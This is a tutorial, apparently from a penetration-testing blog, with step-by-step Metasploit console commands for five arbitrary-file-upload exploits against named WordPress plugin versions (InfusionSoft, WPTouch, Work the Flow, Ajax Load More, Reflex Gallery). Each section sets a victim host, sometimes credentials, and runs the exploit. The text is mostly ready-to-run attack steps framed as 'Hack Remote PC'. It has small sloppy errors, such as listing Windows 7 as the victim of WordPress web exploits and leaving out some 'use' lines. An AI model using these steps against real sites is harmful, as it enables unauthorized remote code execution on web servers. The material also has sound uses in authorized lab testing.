Exploit Remote PC using Wordpress InfusionSoft Upload Vulnerability


Exploit Targets
Infusionsoft Gravity Forms plugin 1.5.3

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


msf exploit (wp_infusionsoft_upload)>set targeturi wordpress
msf exploit (wp_infusionsoft_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_infusionsoft_upload)>exploit       

Exploit Remote PC using WordPress WordPress WPTouch Authenticated File Upload

The Wordpress WPTouch plugin contains authenticated file upload vulnerability. A wp-nonce (CSRF token) is created on the backend index page and the same token is used on handling ajax file uploads through the plugin. By sending the captured nonce with the upload, we can upload arbitrary files to the upload folder. Because the plugin also uses it's own file upload mechanism instead of the wordpress api it's possible to upload any file type. The user provided does not need special rights, and users with "Contributor" role can be abused.

Exploit Targets
Wp touch 3.4.3

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_wptouch_file_upload
msf exploit (wp_wptouch_file_upload)>set targeturi wordpress
msf exploit (wp_wptouch_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_wptouch_file_upload)>set username admin
msf exploit (wp_wptouch_file_upload)>set password admin123
msf exploit (wp_wptouch_file_upload)>set rport 80
msf exploit (wp_wptouch_file_upload)>exploit     

Hack Remote PC using Wordpress Work the Flow Upload Vulnerability


Exploit Targets
Work the Flow plugin, version 2.5.2.

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


msf exploit (wp_worktheflow_upload)>set targeturi wordpress
msf exploit (wp_worktheflow_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_worktheflow_upload)>exploit     

Hack Remote PC using Wordpress Ajax Load More PHP Upload Vulnerability


Exploit Targets
WordPress Ajax Load More 2.8.0

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_ajax­­­­­_load_more_file_upload
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set targeturi wordpress
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_username admin
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_password admin123
msf exploit (wp_ajax­­­­­_load_more_file_upload)>exploit     

Hack Remote PC using WordPress Reflex Gallery Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution

Exploit Targets
Reflex Gallery version 3.1.3

Requirement
Attacker: kali Linux
Victim PC: Wordpress Installed


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_reflexgallery_file_upload
msf exploit (wp_reflexgallery_file_upload)>set targeturi wordpress
msf exploit (wp_reflexgallery_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_reflexgallery_file_upload)>set rport 80
msf exploit (wp_reflexgallery_file_upload)>exploit